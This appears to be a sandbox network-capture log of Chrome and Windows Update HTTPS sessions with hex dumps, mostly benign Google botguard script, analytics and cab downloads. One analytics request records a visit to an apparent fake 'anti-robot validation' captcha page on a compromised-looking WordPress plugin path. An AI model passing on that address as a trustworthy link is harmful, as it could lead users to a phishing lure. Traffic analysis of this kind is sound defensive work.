2024-04-20 06:24:13 UTC	539	IN	HTTP/1.1 200 OK P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Date: Sat, 20 Apr 2024 06:24:13 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Content-Type: image/gif X-Content-Type-Options: nosniff Server: cafe Content-Length: 42 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-20 06:24:13 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b Data Ascii: GIF89a!,D;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49772	172.253.124.106	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:13 UTC	660	OUT	GET /js/bg/rIjZlM8ZNfOeVQTojtt5OPuY9YnE0CAT82tG0V-YUX0.js HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://recaptcha.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:13 UTC	811	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs" Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]} Content-Length: 18291 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 19 Apr 2024 13:48:39 GMT Expires: Sat, 19 Apr 2025 13:48:39 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 04 Apr 2024 18:30:00 GMT Content-Type: text/javascript Vary: Accept-Encoding Age: 59734 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-20 06:24:13 UTC	444	IN	Data Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 29 7b 69 66 28 21 28 77 3d 28 7a 3d 6e 75 6c 6c 2c 61 2e 74 72 75 73 74 65 64 54 79 70 65 73 29 2c 77 29 7c 7c 21 77 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 7a 3b 74 72 79 7b 7a 3d 77 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 6d 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 6d 2c 63 72 65 61 74 Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var a=this\|\|self,K=function(z,w){if(!(w=(z=null,a.trustedTypes),w)\|\|!w.createPolicy)return z;try{z=w.createPolicy("bg",{createHTML:m,createScript:m,creat
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 65 61 74 65 53 63 72 69 70 74 28 46 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 46 29 7b 72 65 74 75 72 6e 22 22 2b 46 7d 7d 28 61 29 28 41 72 72 61 79 28 37 38 32 34 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 29 2e 6a 6f 69 6e 28 22 5c 6e 22 29 2b 5b 27 28 66 75 6e 63 74 69 6f 6e 28 29 7b 2f 2a 27 2c 0a 27 27 2c 0a 27 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 69 73 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 29 7b 28 28 77 2e 70 75 73 68 28 7a 5b 30 5d 3c 3c 32 34 7c 7a 5b 31 5d 3c 3c 31 36 7c 7a 5b 32 5d 3c 3c 38 7c 7a 5b 33 5d 29 2c 77 29 2e 70 75 73 68 28 7a 5b 34 5d 3c 3c 32 34 7c 7a 5b 35 5d 3c 3c 31 36 7c 7a 5b 36 5d 3c 3c 38 7c 7a 5b 37 5d 29 2c 77 Data Ascii: eateScript(F)}:function(F){return""+F}}(a)(Array(7824Math.random()\|0).join("\n")+['(function(){/','',' SPDX-License-Identifier: Apache-2.0','*/','var is=function(z,w){((w.push(z[0]<<24\|z[1]<<16\|z[2]<<8\|z[3]),w).push(z[4]<<24\|z[5]<<16\|z[6]<<8\|z[7]),w
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 35 2c 61 3e 3e 3e 32 34 26 32 35 35 2c 61 3e 3e 3e 31 36 26 32 35 35 2c 61 3e 3e 3e 38 26 32 35 35 2c 61 3e 3e 3e 30 26 32 35 35 5d 7d 2c 73 36 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 74 68 69 73 2e 43 3d 74 68 69 73 2e 50 3d 74 68 69 73 2e 6e 3d 30 7d 72 65 74 75 72 6e 20 77 3d 28 61 2e 70 72 6f 74 6f 74 79 70 65 2e 4e 68 3d 28 61 2e 70 72 6f 74 6f 74 79 70 65 2e 62 50 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 68 69 73 2e 6e 3f 30 3a 4d 61 74 68 2e 73 71 72 74 28 74 68 69 73 2e 43 2f 74 68 69 73 2e 6e 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 6d 2c 71 29 7b 28 74 68 69 73 2e 50 2b 3d 28 71 3d 6d 2d 74 68 69 73 2e 50 2c 74 68 69 73 2e 6e 2b 2b 2c 71 29 2f 74 68 69 73 2e 6e 2c 74 68 69 73 Data Ascii: 5,a>>>24&255,a>>>16&255,a>>>8&255,a>>>0&255]},s6=function(z,w){function a(){this.C=this.P=this.n=0}return w=(a.prototype.Nh=(a.prototype.bP=function(){return 0===this.n?0:Math.sqrt(this.C/this.n)},function(m,q){(this.P+=(q=m-this.P,this.n++,q)/this.n,this
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 29 2c 4d 29 2e 52 3d 5b 5d 2c 7a 2e 5a 3d 3d 7a 3f 28 76 28 7a 29 7c 30 29 2d 31 3a 31 29 2c 42 28 7a 29 29 2c 30 29 3b 71 3c 77 3b 71 2b 2b 29 4d 2e 52 2e 70 75 73 68 28 42 28 7a 29 29 3b 66 6f 72 28 3b 77 2d 2d 3b 29 4d 2e 52 5b 77 5d 3d 47 28 7a 2c 4d 2e 52 5b 77 5d 29 3b 72 65 74 75 72 6e 28 4d 2e 6b 74 3d 47 28 7a 2c 61 29 2c 4d 29 2e 4f 4f 3d 47 28 7a 2c 6d 29 2c 4d 7d 2c 47 63 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 2c 61 2c 6d 2c 71 2c 4d 29 7b 69 66 28 21 77 2e 44 29 7b 77 2e 4b 2b 2b 3b 74 72 79 7b 66 6f 72 28 71 3d 28 61 3d 28 4d 3d 76 6f 69 64 20 30 2c 77 2e 57 29 2c 30 29 3b 2d 2d 7a 3b 29 74 72 79 7b 69 66 28 6d 3d 76 6f 69 64 20 30 2c 77 2e 47 29 4d 3d 4b 49 28 77 2c 77 2e 47 29 3b 65 6c 73 65 7b 69 66 28 71 3d 47 28 77 2c 36 34 29 2c 71 3e Data Ascii: ),M).R=[],z.Z==z?(v(z)\|0)-1:1),B(z)),0);q<w;q++)M.R.push(B(z));for(;w--;)M.R[w]=G(z,M.R[w]);return(M.kt=G(z,a),M).OO=G(z,m),M},Gc=function(z,w,a,m,q,M){if(!w.D){w.K++;try{for(q=(a=(M=void 0,w.W),0);--z;)try{if(m=void 0,w.G)M=KI(w,w.G);else{if(q=G(w,64),q>
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 2c 66 61 6c 73 65 2c 7a 29 2c 61 7d 2c 50 3d 7b 70 61 73 73 69 76 65 3a 74 72 75 65 2c 63 61 70 74 75 72 65 3a 74 72 75 65 7d 2c 79 4d 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 2c 61 2c 6d 29 7b 66 6f 72 28 3b 7a 2e 6c 2e 6c 65 6e 67 74 68 3b 29 7b 6d 3d 28 7a 2e 67 3d 6e 75 6c 6c 2c 7a 2e 6c 29 2e 70 6f 70 28 29 3b 74 72 79 7b 61 3d 62 73 28 7a 2c 6d 29 7d 63 61 74 63 68 28 71 29 7b 6e 28 7a 2c 71 29 7d 69 66 28 77 26 26 7a 2e 67 29 7b 77 3d 7a 2e 67 2c 77 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 28 7a 2c 74 72 75 65 2c 74 72 75 65 29 7d 29 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 61 7d 2c 78 34 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 2c 61 2c 6d 2c 71 2c 4d 2c 74 29 7b 66 6f 72 28 4d 3d 28 7a 2e 64 31 3d 28 7a 2e 67 31 3d 61 57 28 7b 67 65 74 3a 66 75 6e Data Ascii: ,false,z),a},P={passive:true,capture:true},yM=function(z,w,a,m){for(;z.l.length;){m=(z.g=null,z.l).pop();try{a=bs(z,m)}catch(q){n(z,q)}if(w&&z.g){w=z.g,w(function(){O(z,true,true)});break}}return a},x4=function(z,w,a,m,q,M,t){for(M=(z.d1=(z.g1=aW({get:fun
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 29 29 2c 7a 29 2c 7a 29 2c 30 29 2c 7a 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 4b 2c 79 29 7b 28 4b 3d 47 28 28 79 3d 30 21 3d 47 28 46 2c 28 79 3d 42 28 46 29 2c 4b 3d 42 28 46 29 2c 79 29 29 2c 46 29 2c 4b 29 2c 79 29 26 26 41 28 36 34 2c 46 2c 4b 29 7d 29 29 2c 30 29 2c 30 5d 29 2c 67 29 29 2c 7a 29 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 4b 2c 79 2c 62 29 7b 21 44 28 74 72 75 65 2c 66 61 6c 73 65 2c 4b 2c 46 29 26 26 28 4b 3d 57 74 28 46 29 2c 79 3d 4b 2e 4f 4f 2c 62 3d 4b 2e 6b 74 2c 46 2e 5a 3d 3d 46 7c 7c 79 3d 3d 46 2e 48 5a 26 26 62 3d 3d 46 29 26 26 28 41 28 4b 2e 56 6f 2c 46 2c 79 2e 61 70 70 6c 79 28 62 2c 4b 2e 52 29 29 2c 46 2e 41 3d 46 2e 59 28 29 29 7d 29 2c 7a 29 2c 5b 5d 29 2c 66 75 6e 63 74 69 6f 6e Data Ascii: )),z),z),0),z),function(){}),function(F,K,y){(K=G((y=0!=G(F,(y=B(F),K=B(F),y)),F),K),y)&&A(64,F,K)})),0),0]),g)),z),function(F,K,y,b){!D(true,false,K,F)&&(K=Wt(F),y=K.OO,b=K.kt,F.Z==F\|\|y==F.HZ&&b==F)&&(A(K.Vo,F,y.apply(b,K.R)),F.A=F.Y())}),z),[]),function
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 28 46 2c 42 28 46 29 29 29 3b 49 28 62 2c 46 2c 66 75 6e 63 74 69 6f 6e 28 59 2c 5a 2c 78 2c 66 2c 72 29 7b 66 6f 72 28 72 3d 28 5a 3d 28 66 3d 5b 5d 2c 30 29 2c 5b 5d 29 3b 5a 3c 53 3b 5a 2b 2b 29 7b 69 66 28 21 28 78 3d 6c 5b 5a 5d 2c 57 5b 5a 5d 29 29 7b 66 6f 72 28 3b 78 3e 3d 66 2e 6c 65 6e 67 74 68 3b 29 66 2e 70 75 73 68 28 42 28 59 29 29 3b 78 3d 66 5b 78 5d 7d 72 2e 70 75 73 68 28 78 29 7d 59 2e 48 3d 55 36 28 28 59 2e 47 3d 55 36 28 64 2e 73 6c 69 63 65 28 29 2c 59 29 2c 72 29 2c 59 29 7d 29 7d 29 29 2c 7a 29 2e 50 5a 3d 30 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 4b 2c 79 2c 62 29 7b 41 28 28 4b 3d 42 28 28 79 3d 28 62 3d 42 28 46 29 2c 42 29 28 46 29 2c 46 29 29 2c 4b 29 2c 46 2c 47 28 46 2c 62 29 7c 7c 47 28 46 2c 79 29 29 7d 29 29 2c 37 34 29 2c Data Ascii: (F,B(F)));I(b,F,function(Y,Z,x,f,r){for(r=(Z=(f=[],0),[]);Z<S;Z++){if(!(x=l[Z],W[Z])){for(;x>=f.length;)f.push(B(Y));x=f[x]}r.push(x)}Y.H=U6((Y.G=U6(d.slice(),Y),r),Y)})})),z).PZ=0,function(F,K,y,b){A((K=B((y=(b=B(F),B)(F),F)),K),F,G(F,b)\|\|G(F,y))})),74),
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 73 65 20 41 28 36 34 2c 46 2c 46 2e 57 29 7d 29 2c 7a 29 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 4b 2c 79 2c 62 2c 57 2c 64 2c 6c 29 7b 66 6f 72 28 62 3d 28 6c 3d 28 57 3d 28 4b 3d 28 64 3d 42 28 46 29 2c 4d 78 28 46 29 29 2c 22 22 29 2c 47 28 46 2c 31 33 35 29 29 2c 6c 2e 6c 65 6e 67 74 68 29 2c 79 3d 30 3b 4b 2d 2d 3b 29 79 3d 28 28 79 7c 30 29 2b 28 4d 78 28 46 29 7c 30 29 29 25 62 2c 57 2b 3d 74 5b 6c 5b 79 5d 5d 3b 41 28 64 2c 46 2c 57 29 7d 29 2c 41 29 28 33 30 32 2c 7a 2c 30 29 2c 66 75 6e 63 74 69 6f 6e 28 46 29 7b 74 73 28 46 2c 31 29 7d 29 29 2c 7a 29 2c 7b 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 4b 29 7b 28 46 3d 28 4b 3d 42 28 46 29 2c 47 28 46 2e 5a 2c 4b 29 29 2c 46 29 5b 30 5d 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 46 Data Ascii: se A(64,F,F.W)}),z),function(F,K,y,b,W,d,l){for(b=(l=(W=(K=(d=B(F),Mx(F)),""),G(F,135)),l.length),y=0;K--;)y=((y\|0)+(Mx(F)\|0))%b,W+=t[l[y]];A(d,F,W)}),A)(302,z,0),function(F){ts(F,1)})),z),{}),function(F,K){(F=(K=B(F),G(F.Z,K)),F)[0].removeEventListener(F
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 7a 2e 42 3d 74 72 75 65 29 2c 77 5b 34 5d 26 26 28 7a 2e 69 3d 74 72 75 65 29 2c 77 5b 35 5d 26 26 28 7a 2e 49 3d 74 72 75 65 29 2c 77 5b 36 5d 26 26 28 7a 2e 54 3d 74 72 75 65 29 2c 7a 2e 6a 28 77 29 3b 65 6c 73 65 20 69 66 28 71 3d 3d 6b 34 29 7a 2e 42 3d 74 72 75 65 2c 7a 2e 6a 28 77 29 3b 65 6c 73 65 20 69 66 28 71 3d 3d 63 74 29 7b 7a 2e 49 3d 74 72 75 65 3b 74 72 79 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 7a 2e 46 2e 6c 65 6e 67 74 68 3b 6d 2b 2b 29 74 72 79 7b 61 3d 7a 2e 46 5b 6d 5d 2c 61 5b 30 5d 5b 61 5b 31 5d 5d 28 61 5b 32 5d 29 7d 63 61 74 63 68 28 4d 29 7b 7d 7d 63 61 74 63 68 28 4d 29 7b 7d 28 30 2c 77 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 4d 2c 74 29 7b 7a 2e 6f 73 28 4d 2c 74 72 75 65 2c 74 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 28 28 Data Ascii: z.B=true),w[4]&&(z.i=true),w[5]&&(z.I=true),w[6]&&(z.T=true),z.j(w);else if(q==k4)z.B=true,z.j(w);else if(q==ct){z.I=true;try{for(m=0;m<z.F.length;m++)try{a=z.F[m],a[0][a[1]](a[2])}catch(M){}}catch(M){}(0,w[1])(function(M,t){z.os(M,true,t)},function(M){((
2024-04-20 06:24:13 UTC	1255	IN	Data Raw: 5b 6d 5d 29 7d 2c 41 73 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 29 7b 69 66 28 28 77 3d 67 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 7a 3d 6e 75 6c 6c 2c 21 77 29 7c 7c 21 77 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 7a 3b 74 72 79 7b 7a 3d 77 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 53 45 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 53 45 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 53 45 7d 29 7d 63 61 74 63 68 28 61 29 7b 67 2e 63 6f 6e 73 6f 6c 65 26 26 67 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 61 2e 6d 65 73 73 61 67 65 29 7d 72 65 74 75 72 6e 20 7a 7d 2c 44 3d 66 75 6e 63 74 69 6f 6e 28 7a 2c 77 2c 61 2c 6d 2c 71 2c 4d 2c 74 2c 46 2c 4b 29 7b 69 66 28 28 28 28 74 3d 28 Data Ascii: [m])},As=function(z,w){if((w=g.trustedTypes,z=null,!w)\|\|!w.createPolicy)return z;try{z=w.createPolicy("bg",{createHTML:SE,createScript:SE,createScriptURL:SE})}catch(a){g.console&&g.console.error(a.message)}return z},D=function(z,w,a,m,q,M,t,F,K){if((((t=(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49776	216.239.38.181	443	7692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:16 UTC	1365	OUT	POST /g/collect?v=2&tid=G-M2RCV3G3BZ&gtm=45je44h0v9139052269za200&_p=1713594248481&gcd=13l3l3l3l1&npa=0&dma=0&cid=1276044083.1713594250&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&pscdl=noapi&_eu=AAAI&_s=2&sid=1713594250&sct=1&seg=0&dl=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dr=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dt=Visitor%20anti-robot%20validation&en=screen_view&_ee=1&ep.screen_name=Captcha%20Page&tfd=8185 HTTP/1.1 Host: analytics.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://makeoversalon.net.in X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://makeoversalon.net.in/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-20 06:24:16 UTC	454	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: https://makeoversalon.net.in Date: Sat, 20 Apr 2024 06:24:16 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate Access-Control-Allow-Credentials: true Content-Type: text/plain Cross-Origin-Resource-Policy: cross-origin Server: Golfe2 Content-Length: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49777	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:18 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=htoAzWVomMrkLpL&MD=Ye3Vu7rv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-20 06:24:19 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 48cd6f71-26e9-4b1c-9faf-d789d6998ec4 MS-RequestId: ea0499e1-20cd-4f10-936a-8467069b73a1 MS-CV: aJG4x+c9I0iTv9C3.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 20 Apr 2024 06:24:18 GMT Connection: close Content-Length: 24490
2024-04-20 06:24:19 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-20 06:24:19 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49782	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-04-20 06:24:56 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=htoAzWVomMrkLpL&MD=Ye3Vu7rv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-20 06:24:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: a032e2dc-f525-4011-8cab-59e6ef7c519a MS-RequestId: 1c621a96-0f4a-4971-84be-5835d9f3e547 MS-CV: 9MbnBiaookmitxjQ.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 20 Apr 2024 06:24:55 GMT Connection: close Content-Length: 25457
2024-04-20 06:24:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-20 06:24:56 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: 